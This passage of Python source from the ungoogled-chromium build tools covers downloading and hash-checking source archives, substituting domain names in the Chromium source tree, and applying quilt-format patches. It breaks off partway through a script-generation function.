'WARNING', 'INFO', 'DEBUG'], help="Set logging level of current script. Only one of 'log-level', 'verbose'," " 'quiet' can be set at a time.") logging_group.add_argument( '--quiet', '-q', action=SetLogLevel, nargs=0, help="Display less outputs to console. Only one of 'log-level', 'verbose'," " 'quiet' can be set at a time.") logging_group.add_argument( '--verbose', '-v', action=SetLogLevel, nargs=0, help="Increase logging verbosity to include DEBUG messages. Only one of " "'log-level', 'verbose', 'quiet' can be set at a time.") File: utils/__init__.py File: utils/downloads.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Module for the downloading, checking, and unpacking of necessary files into the source tree. """ import argparse import configparser import enum import hashlib import shutil import ssl import subprocess import sys import urllib.request from pathlib import Path from _common import ENCODING, USE_REGISTRY, ExtractorEnum, get_logger, \ get_chromium_version, add_common_params from _extraction import extract_tar_file, extract_with_7z, extract_with_winrar sys.path.insert(0, str(Path(__file__).parent / 'third_party')) import schema #pylint: disable=wrong-import-position, wrong-import-order sys.path.pop(0) # Constants class HashesURLEnum(str, enum.Enum): """Enum for supported hash URL schemes""" CHROMIUM = 'chromium' class HashMismatchError(BaseException): """Exception for computed hashes not matching expected hashes""" class DownloadInfo: #pylint: disable=too-few-public-methods """Representation of an downloads.ini file for downloading files""" _hashes = ('md5', 'sha1', 'sha256', 'sha512') hash_url_delimiter = '|' _nonempty_keys = ('url', 'download_filename') _optional_keys = ( 'version', 'strip_leading_dirs', ) _passthrough_properties = (*_nonempty_keys, *_optional_keys, 'extractor', 'output_path') _ini_vars = { '_chromium_version': get_chromium_version(), } @staticmethod def _is_hash_url(value): return value.count(DownloadInfo.hash_url_delimiter) == 2 and value.split( DownloadInfo.hash_url_delimiter)[0] in iter(HashesURLEnum) _schema = schema.Schema({ schema.Optional(schema.And(str, len)): { **{x: schema.And(str, len) for x in _nonempty_keys}, 'output_path': (lambda x: str(Path(x).relative_to(''))), **{schema.Optional(x): schema.And(str, len) for x in _optional_keys}, schema.Optional('extractor'): schema.Or(ExtractorEnum.TAR, ExtractorEnum.SEVENZIP, ExtractorEnum.WINRAR), schema.Optional(schema.Or(*_hashes)): schema.And(str, len), schema.Optional('hash_url'): lambda x: DownloadInfo._is_hash_url(x), #pylint: disable=unnecessary-lambda } }) class _DownloadsProperties: #pylint: disable=too-few-public-methods def __init__(self, section_dict, passthrough_properties, hashes): self._section_dict = section_dict self._passthrough_properties = passthrough_properties self._hashes = hashes def has_hash_url(self): """ Returns a boolean indicating whether the current download has a hash URL""" return 'hash_url' in self._section_dict def __getattr__(self, name): if name in self._passthrough_properties: return self._section_dict.get(name, fallback=None) if name == 'hashes': hashes_dict = {} for hash_name in (*self._hashes, 'hash_url'): value = self._section_dict.get(hash_name, fallback=None) if value: if hash_name == 'hash_url': value = value.split(DownloadInfo.hash_url_delimiter) hashes_dict[hash_name] = value return hashes_dict raise AttributeError('"{}" has no attribute "{}"'.format(type(self).__name__, name)) def _parse_data(self, path): """ Parses an INI file located at path Raises schema.SchemaError if validation fails """ def _section_generator(data): for section in data: if section == configparser.DEFAULTSECT: continue yield section, dict( filter(lambda x: x[0] not in self._ini_vars, data.items(section))) new_data = configparser.ConfigParser(defaults=self._ini_vars) with path.open(encoding=ENCODING) as ini_file: new_data.read_file(ini_file, source=str(path)) try: self._schema.validate(dict(_section_generator(new_data))) except schema.SchemaError as exc: get_logger().error('downloads.ini failed schema validation (located in %s)', path) raise exc return new_data def __init__(self, ini_paths): """Reads an iterable of pathlib.Path to download.ini files""" self._data = configparser.ConfigParser() for path in ini_paths: self._data.read_dict(self._parse_data(path)) def __getitem__(self, section): """ Returns an object with keys as attributes and values already pre-processed strings """ return self._DownloadsProperties(self._data[section], self._passthrough_properties, self._hashes) def __contains__(self, item): """ Returns True if item is a name of a section; False otherwise. """ return self._data.has_section(item) def __iter__(self): """Returns an iterator over the section names""" return iter(self._data.sections()) def properties_iter(self): """Iterator for the download properties sorted by output path""" return sorted(map(lambda x: (x, self[x]), self), key=(lambda x: str(Path(x[1].output_path)))) class _UrlRetrieveReportHook: #pylint: disable=too-few-public-methods """Hook for urllib.request.urlretrieve to log progress information to console""" def __init__(self): self._max_len_printed = 0 self._last_percentage = None def __call__(self, block_count, block_size, total_size): # Use total_blocks to handle case total_size < block_size # total_blocks is ceiling of total_size / block_size # Ceiling division from: https://stackoverflow.com/a/17511341 total_blocks = -(-total_size // block_size) if total_blocks > 0: # Do not needlessly update the console. Since the console is # updated synchronously, we don't want updating the console to # bottleneck downloading. Thus, only refresh the output when the # displayed value should change. percentage = round(block_count / total_blocks, ndigits=3) if percentage == self._last_percentage: return self._last_percentage = percentage print('\r' + ' ' * self._max_len_printed, end='') status_line = 'Progress: {:.1%} of {:,d} B'.format(percentage, total_size) else: downloaded_estimate = block_count * block_size status_line = 'Progress: {:,d} B of unknown size'.format(downloaded_estimate) self._max_len_printed = len(status_line) print('\r' + status_line, end='') def _download_via_urllib(url, file_path, show_progress, disable_ssl_verification): reporthook = None if show_progress: reporthook = _UrlRetrieveReportHook() if disable_ssl_verification: # TODO: Remove this or properly implement disabling SSL certificate verification orig_https_context = ssl._create_default_https_context #pylint: disable=protected-access ssl._create_default_https_context = ssl._create_unverified_context #pylint: disable=protected-access try: urllib.request.urlretrieve(url, str(file_path), reporthook=reporthook) finally: # Try to reduce damage of hack by reverting original HTTPS context ASAP if disable_ssl_verification: ssl._create_default_https_context = orig_https_context #pylint: disable=protected-access if show_progress: print() def _download_if_needed(file_path, url, show_progress, disable_ssl_verification): """ Downloads a file from url to the specified path file_path if necessary. If show_progress is True, download progress is printed to the console. """ if file_path.exists(): get_logger().info('%s already exists. Skipping download.', file_path) return # File name for partially download file tmp_file_path = file_path.with_name(file_path.name + '.partial') if tmp_file_path.exists(): get_logger().debug('Resuming downloading URL %s ...', url) else: get_logger().debug('Downloading URL %s ...', url) # Perform download if shutil.which('curl'): get_logger().debug('Using curl') try: subprocess.run(['curl', '-fL', '-o', str(tmp_file_path), '-C', '-', url], check=True) except subprocess.CalledProcessError as exc: get_logger().error('curl failed. Re-run the download command to resume downloading.') raise exc else: get_logger().debug('Using urllib') _download_via_urllib(url, tmp_file_path, show_progress, disable_ssl_verification) # Download complete; rename file tmp_file_path.rename(file_path) def _chromium_hashes_generator(hashes_path): with hashes_path.open(encoding=ENCODING) as hashes_file: hash_lines = hashes_file.read().splitlines() for hash_name, hash_hex, _ in map(lambda x: x.lower().split(' '), hash_lines): if hash_name in hashlib.algorithms_available: yield hash_name, hash_hex else: get_logger().warning('Skipping unknown hash algorithm: %s', hash_name) def _get_hash_pairs(download_properties, cache_dir): """Generator of (hash_name, hash_hex) for the given download""" for entry_type, entry_value in download_properties.hashes.items(): if entry_type == 'hash_url': hash_processor, hash_filename, _ = entry_value if hash_processor == 'chromium': yield from _chromium_hashes_generator(cache_dir / hash_filename) else: raise ValueError('Unknown hash_url processor: %s' % hash_processor) else: yield entry_type, entry_value def retrieve_downloads(download_info, cache_dir, show_progress, disable_ssl_verification=False): """ Retrieve downloads into the downloads cache. download_info is the DowloadInfo of downloads to retrieve. cache_dir is the pathlib.Path to the downloads cache. show_progress is a boolean indicating if download progress is printed to the console. disable_ssl_verification is a boolean indicating if certificate verification should be disabled for downloads using HTTPS. Raises FileNotFoundError if the downloads path does not exist. Raises NotADirectoryError if the downloads path is not a directory. """ if not cache_dir.exists(): raise FileNotFoundError(cache_dir) if not cache_dir.is_dir(): raise NotADirectoryError(cache_dir) for download_name, download_properties in download_info.properties_iter(): get_logger().info('Downloading "%s" to "%s" ...', download_name, download_properties.download_filename) download_path = cache_dir / download_properties.download_filename _download_if_needed(download_path, download_properties.url, show_progress, disable_ssl_verification) if download_properties.has_hash_url(): get_logger().info('Downloading hashes for "%s"', download_name) _, hash_filename, hash_url = download_properties.hashes['hash_url'] _download_if_needed(cache_dir / hash_filename, hash_url, show_progress, disable_ssl_verification) def check_downloads(download_info, cache_dir): """ Check integrity of the downloads cache. download_info is the DownloadInfo of downloads to unpack. cache_dir is the pathlib.Path to the downloads cache. Raises source_retrieval.HashMismatchError when the computed and expected hashes do not match. """ for download_name, download_properties in download_info.properties_iter(): get_logger().info('Verifying hashes for "%s" ...', download_name) download_path = cache_dir / download_properties.download_filename with download_path.open('rb') as file_obj: archive_data = file_obj.read() for hash_name, hash_hex in _get_hash_pairs(download_properties, cache_dir): get_logger().debug('Verifying %s hash...', hash_name) hasher = hashlib.new(hash_name, data=archive_data) if not hasher.hexdigest().lower() == hash_hex.lower(): raise HashMismatchError(download_path) def unpack_downloads(download_info, cache_dir, output_dir, skip_unused, sysroot, extractors=None): """ Unpack downloads in the downloads cache to output_dir. Assumes all downloads are retrieved. download_info is the DownloadInfo of downloads to unpack. cache_dir is the pathlib.Path directory containing the download cache output_dir is the pathlib.Path directory to unpack the downloads to. skip_unused is a boolean that determines if unused paths should be extracted. sysroot is a string containing a sysroot to unpack if any. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for 7-Zip and WinRAR. May raise undetermined exceptions during archive unpacking. """ for download_name, download_properties in download_info.properties_iter(): download_path = cache_dir / download_properties.download_filename get_logger().info('Unpacking "%s" to %s ...', download_name, download_properties.output_path) extractor_name = download_properties.extractor or ExtractorEnum.TAR if extractor_name == ExtractorEnum.SEVENZIP: extractor_func = extract_with_7z elif extractor_name == ExtractorEnum.WINRAR: extractor_func = extract_with_winrar elif extractor_name == ExtractorEnum.TAR: extractor_func = extract_tar_file else: raise NotImplementedError(extractor_name) if download_properties.strip_leading_dirs is None: strip_leading_dirs_path = None else: strip_leading_dirs_path = Path(download_properties.strip_leading_dirs) extractor_func(archive_path=download_path, output_dir=output_dir / Path(download_properties.output_path), relative_to=strip_leading_dirs_path, skip_unused=skip_unused, sysroot=sysroot, extractors=extractors) def _add_common_args(parser): parser.add_argument( '-i', '--ini', type=Path, nargs='+', help='The downloads INI to parse for downloads. Can be specified multiple times.') parser.add_argument('-c', '--cache', type=Path, required=True, help='Path to the directory to cache downloads.') def _retrieve_callback(args): retrieve_downloads(DownloadInfo(args.ini), args.cache, args.show_progress, args.disable_ssl_verification) try: check_downloads(DownloadInfo(args.ini), args.cache) except HashMismatchError as exc: get_logger().error('File checksum does not match: %s', exc) sys.exit(1) def _unpack_callback(args): extractors = { ExtractorEnum.SEVENZIP: args.sevenz_path, ExtractorEnum.WINRAR: args.winrar_path, ExtractorEnum.TAR: args.tar_path, } unpack_downloads(DownloadInfo(args.ini), args.cache, args.output, args.skip_unused, args.sysroot, extractors) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser(description=__doc__) add_common_params(parser) subparsers = parser.add_subparsers(title='Download actions', dest='action') # retrieve retrieve_parser = subparsers.add_parser( 'retrieve', help='Retrieve and check download files', description=('Retrieves and checks downloads without unpacking. ' 'The downloader will attempt to use CLI command "curl". ' 'If it is not present, Python\'s urllib will be used. However, only ' 'the CLI-based downloaders can be resumed if the download is aborted.')) _add_common_args(retrieve_parser) retrieve_parser.add_argument('--hide-progress-bar', action='store_false', dest='show_progress', help='Hide the download progress.') retrieve_parser.add_argument( '--disable-ssl-verification', action='store_true', help='Disables certification verification for downloads using HTTPS.') retrieve_parser.set_defaults(callback=_retrieve_callback) # unpack unpack_parser = subparsers.add_parser( 'unpack', help='Unpack download files', description='Verifies hashes of and unpacks download files into the specified directory.') _add_common_args(unpack_parser) unpack_parser.add_argument('--tar-path', default='tar', help=('(Linux and macOS only) Command or path to the BSD or GNU tar ' 'binary for extraction. Default: %(default)s')) unpack_parser.add_argument( '--7z-path', dest='sevenz_path', default=USE_REGISTRY, help=('Command or path to 7-Zip\'s "7z" binary. If "_use_registry" is ' 'specified, determine the path from the registry. Default: %(default)s')) unpack_parser.add_argument( '--winrar-path', dest='winrar_path', default=USE_REGISTRY, help=('Command or path to WinRAR\'s "winrar" binary. If "_use_registry" is ' 'specified, determine the path from the registry. Default: %(default)s')) unpack_parser.add_argument('output', type=Path, help='The directory to unpack to.') unpack_parser.add_argument('--skip-unused', action='store_true', help='Skip extraction of unused directories (CONTINGENT_PATHS).') unpack_parser.add_argument('--sysroot', choices=('amd64', 'i386'), help=('Extracts the sysroot for the given architecture ' 'when --skip-unused is set.')) unpack_parser.set_defaults(callback=_unpack_callback) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/domain_substitution.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Substitute domain names in the source tree with blockable strings. """ from pathlib import Path import argparse import collections import contextlib import io import os import stat import re import tarfile import tempfile import zlib from _extraction import extract_tar_file from _common import ENCODING, get_logger, add_common_params # Encodings to try on source tree files TREE_ENCODINGS = ('UTF-8', 'ISO-8859-1') # Constants for domain substitution cache _INDEX_LIST = 'cache_index.list' _INDEX_HASH_DELIMITER = '|' _ORIG_DIR = 'orig' # Constants for timestamp manipulation # Delta between all file timestamps in nanoseconds _TIMESTAMP_DELTA = 1 * 10**9 class DomainRegexList: """Representation of a domain_regex.list file""" _regex_pair_tuple = collections.namedtuple('DomainRegexPair', ('pattern', 'replacement')) # Constants for format: _PATTERN_REPLACE_DELIM = '#' def __init__(self, path): self._data = tuple(filter(len, path.read_text().splitlines())) # Cache of compiled regex pairs self._compiled_regex = None def _compile_regex(self, line): """Generates a regex pair tuple for the given line""" pattern, replacement = line.split(self._PATTERN_REPLACE_DELIM) return self._regex_pair_tuple(re.compile(pattern), replacement) @property def regex_pairs(self): """ Returns a tuple of compiled regex pairs """ if not self._compiled_regex: self._compiled_regex = tuple(map(self._compile_regex, self._data)) return self._compiled_regex @property def search_regex(self): """ Returns a single expression to search for domains """ return re.compile('|'.join( map(lambda x: x.split(self._PATTERN_REPLACE_DELIM, 1)[0], self._data))) # Private Methods def _substitute_path(path, regex_iter): """ Perform domain substitution on path and add it to the domain substitution cache. path is a pathlib.Path to the file to be domain substituted. regex_iter is an iterable of regular expression namedtuple like from config.DomainRegexList.regex_pairs() Returns a tuple of the CRC32 hash of the substituted raw content and the original raw content; None for both entries if no substitutions were made. Raises FileNotFoundError if path does not exist. Raises UnicodeDecodeError if path's contents cannot be decoded. """ if not os.access(path, os.W_OK): # If the patch cannot be written to, it cannot be opened for updating print(str(path) + " cannot be opened for writing! Adding write permission...") path.chmod(path.stat().st_mode | stat.S_IWUSR) with path.open('r+b') as input_file: original_content = input_file.read() if not original_content: return (None, None) content = None encoding = None for encoding in TREE_ENCODINGS: try: content = original_content.decode(encoding) break except UnicodeDecodeError: continue if not content: raise UnicodeDecodeError('Unable to decode with any encoding: %s' % path) file_subs = 0 for regex_pair in regex_iter: content, sub_count = regex_pair.pattern.subn(regex_pair.replacement, content) file_subs += sub_count if file_subs > 0: substituted_content = content.encode(encoding) input_file.seek(0) input_file.write(content.encode(encoding)) input_file.truncate() return (zlib.crc32(substituted_content), original_content) return (None, None) def _validate_file_index(index_file, resolved_tree, cache_index_files): """ Validation of file index and hashes against the source tree. Updates cache_index_files Returns True if the file index is valid; False otherwise """ all_hashes_valid = True crc32_regex = re.compile(r'^[a-zA-Z0-9]{8}$') for entry in index_file.read().decode(ENCODING).splitlines(): try: relative_path, file_hash = entry.split(_INDEX_HASH_DELIMITER) except ValueError as exc: get_logger().error('Could not split entry "%s": %s', entry, exc) continue if not relative_path or not file_hash: get_logger().error('Entry %s of domain substitution cache file index is not valid', _INDEX_HASH_DELIMITER.join((relative_path, file_hash))) all_hashes_valid = False continue if not crc32_regex.match(file_hash): get_logger().error('File index hash for %s does not appear to be a CRC32 hash', relative_path) all_hashes_valid = False continue if zlib.crc32((resolved_tree / relative_path).read_bytes()) != int(file_hash, 16): get_logger().error('Hashes do not match for: %s', relative_path) all_hashes_valid = False continue if relative_path in cache_index_files: get_logger().error('File %s shows up at least twice in the file index', relative_path) all_hashes_valid = False continue cache_index_files.add(relative_path) return all_hashes_valid @contextlib.contextmanager def _update_timestamp(path: os.PathLike, set_new: bool) -> None: """ Context manager to set the timestamp of the path to plus or minus a fixed delta, regardless of modifications within the context. if set_new is True, the delta is added. Otherwise, the delta is subtracted. """ stats = os.stat(path) if set_new: new_timestamp = (stats.st_atime_ns + _TIMESTAMP_DELTA, stats.st_mtime_ns + _TIMESTAMP_DELTA) else: new_timestamp = (stats.st_atime_ns - _TIMESTAMP_DELTA, stats.st_mtime_ns - _TIMESTAMP_DELTA) try: yield finally: os.utime(path, ns=new_timestamp) # Public Methods def apply_substitution(regex_path, files_path, source_tree, domainsub_cache): """ Substitute domains in source_tree with files and substitutions, and save the pre-domain substitution archive to presubdom_archive. regex_path is a pathlib.Path to domain_regex.list files_path is a pathlib.Path to domain_substitution.list source_tree is a pathlib.Path to the source tree. domainsub_cache is a pathlib.Path to the domain substitution cache. Raises NotADirectoryError if the patches directory is not a directory or does not exist Raises FileNotFoundError if the source tree or required directory does not exist. Raises FileExistsError if the domain substitution cache already exists. Raises ValueError if an entry in the domain substitution list contains the file index hash delimiter. """ if not source_tree.exists(): raise FileNotFoundError(source_tree) if not regex_path.exists(): raise FileNotFoundError(regex_path) if not files_path.exists(): raise FileNotFoundError(files_path) if domainsub_cache and domainsub_cache.exists(): raise FileExistsError(domainsub_cache) resolved_tree = source_tree.resolve() regex_pairs = DomainRegexList(regex_path).regex_pairs fileindex_content = io.BytesIO() with tarfile.open(str(domainsub_cache), 'w:%s' % domainsub_cache.suffix[1:], compresslevel=1) if domainsub_cache else open(os.devnull, 'w') as cache_tar: for relative_path in filter(len, files_path.read_text().splitlines()): if _INDEX_HASH_DELIMITER in relative_path: if domainsub_cache: # Cache tar will be incomplete; remove it for convenience cache_tar.close() domainsub_cache.unlink() raise ValueError( 'Path "%s" contains the file index hash delimiter "%s"' % relative_path, _INDEX_HASH_DELIMITER) path = resolved_tree / relative_path if not path.exists(): get_logger().warning('Skipping non-existant path: %s', path) continue if path.is_symlink(): get_logger().warning('Skipping path that has become a symlink: %s', path) continue with _update_timestamp(path, set_new=True): crc32_hash, orig_content = _substitute_path(path, regex_pairs) if crc32_hash is None: get_logger().info('Path has no substitutions: %s', relative_path) continue if domainsub_cache: fileindex_content.write('{}{}{:08x}\n'.format(relative_path, _INDEX_HASH_DELIMITER, crc32_hash).encode(ENCODING)) orig_tarinfo = tarfile.TarInfo(str(Path(_ORIG_DIR) / relative_path)) orig_tarinfo.size = len(orig_content) with io.BytesIO(orig_content) as orig_file: cache_tar.addfile(orig_tarinfo, orig_file) if domainsub_cache: fileindex_tarinfo = tarfile.TarInfo(_INDEX_LIST) fileindex_tarinfo.size = fileindex_content.tell() fileindex_content.seek(0) cache_tar.addfile(fileindex_tarinfo, fileindex_content) def revert_substitution(domainsub_cache, source_tree): """ Revert domain substitution on source_tree using the pre-domain substitution archive presubdom_archive. It first checks if the hashes of the substituted files match the hashes computed during the creation of the domain substitution cache, raising KeyError if there are any mismatches. Then, it proceeds to reverting files in the source_tree. domainsub_cache is removed only if all the files from the domain substitution cache were relocated to the source tree. domainsub_cache is a pathlib.Path to the domain substitution cache. source_tree is a pathlib.Path to the source tree. Raises KeyError if: * There is a hash mismatch while validating the cache * The cache's file index is corrupt or missing * The cache is corrupt or is not consistent with the file index Raises FileNotFoundError if the source tree or domain substitution cache do not exist. """ # This implementation trades disk space/wear for performance (unless a ramdisk is used # for the source tree) # Assumptions made for this process: # * The correct tar file was provided (so no huge amount of space is wasted) # * The tar file is well-behaved (e.g. no files extracted outside of destination path) # * Cache file index and cache contents are already consistent (i.e. no files exclusive to # one or the other) if not domainsub_cache: get_logger().error('Cache file must be specified.') if not domainsub_cache.exists(): raise FileNotFoundError(domainsub_cache) if not source_tree.exists(): raise FileNotFoundError(source_tree) resolved_tree = source_tree.resolve() cache_index_files = set() # All files in the file index with tempfile.TemporaryDirectory(prefix='domsubcache_files', dir=str(resolved_tree)) as tmp_extract_name: extract_path = Path(tmp_extract_name) get_logger().debug('Extracting domain substitution cache...') extract_tar_file(domainsub_cache, extract_path, None, False, None) # Validate source tree file hashes match get_logger().debug('Validating substituted files in source tree...') with (extract_path / _INDEX_LIST).open('rb') as index_file: #pylint: disable=no-member if not _validate_file_index(index_file, resolved_tree, cache_index_files): raise KeyError('Domain substitution cache file index is corrupt or hashes mismatch ' 'the source tree.') # Move original files over substituted ones get_logger().debug('Moving original files over substituted ones...') for relative_path in cache_index_files: with _update_timestamp(resolved_tree / relative_path, set_new=False): (extract_path / _ORIG_DIR / relative_path).replace(resolved_tree / relative_path) # Quick check for unused files in cache orig_has_unused = False for orig_path in (extract_path / _ORIG_DIR).rglob('*'): #pylint: disable=no-member if orig_path.is_file(): get_logger().warning('Unused file from cache: %s', orig_path) orig_has_unused = True if orig_has_unused: get_logger().warning('Cache contains unused files. Not removing.') else: domainsub_cache.unlink() def _callback(args): """CLI Callback""" if args.reverting: revert_substitution(args.cache, args.directory) else: apply_substitution(args.regex, args.files, args.directory, args.cache) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() add_common_params(parser) parser.set_defaults(callback=_callback) subparsers = parser.add_subparsers(title='', dest='packaging') # apply apply_parser = subparsers.add_parser( 'apply', help='Apply domain substitution', description='Applies domain substitution and creates the domain substitution cache.') apply_parser.add_argument('-r', '--regex', type=Path, required=True, help='Path to domain_regex.list') apply_parser.add_argument('-f', '--files', type=Path, required=True, help='Path to domain_substitution.list') apply_parser.add_argument( '-c', '--cache', type=Path, help='The path to the domain substitution cache. The path must not already exist.') apply_parser.add_argument('directory', type=Path, help='The directory to apply domain substitution') apply_parser.set_defaults(reverting=False) # revert revert_parser = subparsers.add_parser( 'revert', help='Revert domain substitution', description='Reverts domain substitution based only on the domain substitution cache.') revert_parser.add_argument('directory', type=Path, help='The directory to reverse domain substitution') revert_parser.add_argument('-c', '--cache', type=Path, required=True, help=('The path to the domain substitution cache. ' 'The path must exist and will be removed if successful.')) revert_parser.set_defaults(reverting=True) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/patches.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2020 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Applies unified diff patches""" import argparse import os import shutil import subprocess from pathlib import Path from _common import get_logger, parse_series, add_common_params def _find_patch_from_env(): patch_bin_path = None patch_bin_env = os.environ.get('PATCH_BIN') if patch_bin_env: patch_bin_path = Path(patch_bin_env) if patch_bin_path.exists(): get_logger().debug('Found PATCH_BIN with path "%s"', patch_bin_path) else: patch_which = shutil.which(patch_bin_env) if patch_which: get_logger().debug('Found PATCH_BIN for command with path "%s"', patch_which) patch_bin_path = Path(patch_which) else: get_logger().debug('PATCH_BIN env variable is not set') return patch_bin_path def _find_patch_from_which(): patch_which = shutil.which('patch') if not patch_which: get_logger().debug('Did not find "patch" in PATH environment variable') return None return Path(patch_which) def find_and_check_patch(patch_bin_path=None): """ Find and/or check the patch binary is working. It finds a path to patch in this order: 1. Use patch_bin_path if it is not None 2. See if "PATCH_BIN" environment variable is set 3. Do "which patch" to find GNU patch Then it does some sanity checks to see if the patch command is valid. Returns the path to the patch binary found. """ if patch_bin_path is None: patch_bin_path = _find_patch_from_env() if patch_bin_path is None: patch_bin_path = _find_patch_from_which() if not patch_bin_path: raise ValueError('Could not find patch from PATCH_BIN env var or "which patch"') if not patch_bin_path.exists(): raise ValueError('Could not find the patch binary: {}'.format(patch_bin_path)) # Ensure patch actually runs cmd = [str(patch_bin_path), '--version'] result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False, universal_newlines=True) if result.returncode: get_logger().error('"%s" returned non-zero exit code', ' '.join(cmd)) get_logger().error('stdout:\n%s', result.stdout) get_logger().error('stderr:\n%s', result.stderr) raise RuntimeError('Got non-zero exit code running "{}"'.format(' '.join(cmd))) return patch_bin_path def dry_run_check(patch_path, tree_path, patch_bin_path=None): """ Run patch --dry-run on a patch tree_path is the pathlib.Path of the source tree to patch patch_path is a pathlib.Path to check reverse is whether the patches should be reversed patch_bin_path is the pathlib.Path of the patch binary, or None to find it automatically See find_and_check_patch() for logic to find "patch" Returns the status code, stdout, and stderr of patch --dry-run """ cmd = [ str(find_and_check_patch(patch_bin_path)), '-p1', '--ignore-whitespace', '-i', str(patch_path), '-d', str(tree_path), '--no-backup-if-mismatch', '--dry-run' ] result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=False, universal_newlines=True) return result.returncode, result.stdout, result.stderr def apply_patches(patch_path_iter, tree_path, reverse=False, patch_bin_path=None): """ Applies or reverses a list of patches tree_path is the pathlib.Path of the source tree to patch patch_path_iter is a list or tuple of pathlib.Path to patch files to apply reverse is whether the patches should be reversed patch_bin_path is the pathlib.Path of the patch binary, or None to find it automatically See find_and_check_patch() for logic to find "patch" Raises ValueError if the patch binary could not be found. """ patch_paths = list(patch_path_iter) patch_bin_path = find_and_check_patch(patch_bin_path=patch_bin_path) if reverse: patch_paths.reverse() logger = get_logger() for patch_path, patch_num in zip(patch_paths, range(1, len(patch_paths) + 1)): cmd = [ str(patch_bin_path), '-p1', '--ignore-whitespace', '-i', str(patch_path), '-d', str(tree_path), '--no-backup-if-mismatch' ] if reverse: cmd.append('--reverse') log_word = 'Reversing' else: cmd.append('--forward') log_word = 'Applying' logger.info('* %s %s (%s/%s)', log_word, patch_path.name, patch_num, len(patch_paths)) logger.debug(' '.join(cmd)) subprocess.run(cmd, check=True) def generate_patches_from_series(patches_dir, resolve=False): """Generates pathlib.Path for patches from a directory in GNU Quilt format""" for patch_path in parse_series(patches_dir / 'series'): if resolve: yield (patches_dir / patch_path).resolve() else: yield patch_path def _copy_files(path_iter, source, destination): """Copy files from source to destination with relative paths from path_iter""" for path in path_iter: (destination / path).parent.mkdir(parents=True, exist_ok=True) shutil.copy2(str(source / path), str(destination / path)) def merge_patches(source_iter, destination, prepend=False): """ Merges GNU quilt-formatted patches directories from sources into destination destination must not already exist, unless prepend is True. If prepend is True, then the source patches will be prepended to the destination. """ series = [] known_paths = set() if destination.exists(): if prepend: if not (destination / 'series').exists(): raise FileNotFoundError( 'Could not find series file in existing destination: {}'.format(destination / 'series')) known_paths.update(generate_patches_from_series(destination)) else: raise FileExistsError('destination already exists: {}'.format(destination)) for source_dir in source_iter: patch_paths = tuple(generate_patches_from_series(source_dir)) patch_intersection = known_paths.intersection(patch_paths) if patch_intersection: raise FileExistsError( 'Patches from {} have conflicting paths with other sources: {}'.format( source_dir, patch_intersection)) series.extend(patch_paths) _copy_files(patch_paths, source_dir, destination) if prepend and (destination / 'series').exists(): series.extend(generate_patches_from_series(destination)) with (destination / 'series').open('w') as series_file: series_file.write('\n'.join(map(str, series))) def _apply_callback(args, parser_error): logger = get_logger() patch_bin_path = None if args.patch_bin is not None: patch_bin_path = Path(args.patch_bin) if not patch_bin_path.exists(): patch_bin_path = shutil.which(args.patch_bin) if patch_bin_path: patch_bin_path = Path(patch_bin_path) else: parser_error( f'--patch-bin "{args.patch_bin}" is not a command or path to executable.') for patch_dir in args.patches: logger.info('Applying patches from %s', patch_dir) apply_patches(generate_patches_from_series(patch_dir, resolve=True), args.target, patch_bin_path=patch_bin_path) def _merge_callback(args, _): merge_patches(args.source, args.destination, args.prepend) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() add_common_params(parser) subparsers = parser.add_subparsers() apply_parser = subparsers.add_parser( 'apply', help='Applies patches (in GNU Quilt format) to the specified source tree') apply_parser.add_argument('--patch-bin', help='The GNU patch command to use. Omit to find it automatically.') apply_parser.add_argument('target', type=Path, help='The directory tree to apply patches onto.') apply_parser.add_argument( 'patches', type=Path, nargs='+', help='The directories containing patches to apply. They must be in GNU quilt format') apply_parser.set_defaults(callback=_apply_callback) merge_parser = subparsers.add_parser('merge', help='Merges patches directories in GNU quilt format') merge_parser.add_argument( '--prepend', '-p', action='store_true', help=('If "destination" exists, prepend patches from sources into it.' ' By default, merging will fail if the destination already exists.')) merge_parser.add_argument( 'destination', type=Path, help=('The directory to write the merged patches to. ' 'The destination must not exist unless --prepend is specified.')) merge_parser.add_argument('source', type=Path, nargs='+', help='The GNU quilt patches to merge.') merge_parser.set_defaults(callback=_merge_callback) args = parser.parse_args() if 'callback' not in args: parser.error('Must specify subcommand apply or merge') args.callback(args, parser.error) if __name__ == '__main__': main() File: utils/make_domsub_script.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2023 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Generate standalone script that performs the domain substitution. """ from pathlib import Path import argparse import re def make_domain_substitution_script(regex_path, files_path, output_path): """ Generate a standalone shell script (which uses Perl) that performs domain substitution on the appropriate files. regex_path is a pathlib.Path to domain_regex.list files_path is a pathlib.Path to domain_substitution.list output_path is a pathlib.Path to the output file. Raises FileNotFoundError if the regex or file lists do not exist. Raises FileExistsError if the output file already exists. """ if not regex_path.exists(): raise FileNotFoundError(regex_path) if not files_path.exists(): raise FileNotFoundError(files_path) if output_path.exists(): raise FileExistsError(output_path) regex_list = tuple(filter(len, regex_path.read_text().splitlines())) files_list = tuple(filter(len, files_path.read_text().splitlines())) # Convert the Python-style regexes into a Perl s/// op perl_replace_list = ['s#' + re.sub(r'\\g<(\d+)>', r'${\1}', x) + '#g' for x in regex_list] files_list_str = '\n'.join(files_list) perl_replace_list_str = '\n'.join([f' {x};' for x in perl_replace_list]) with open(output_path, 'w') as out: out.write("""#!/bin/sh -e # # This script performs domain substitution on the Chromium source files. # # Generated by 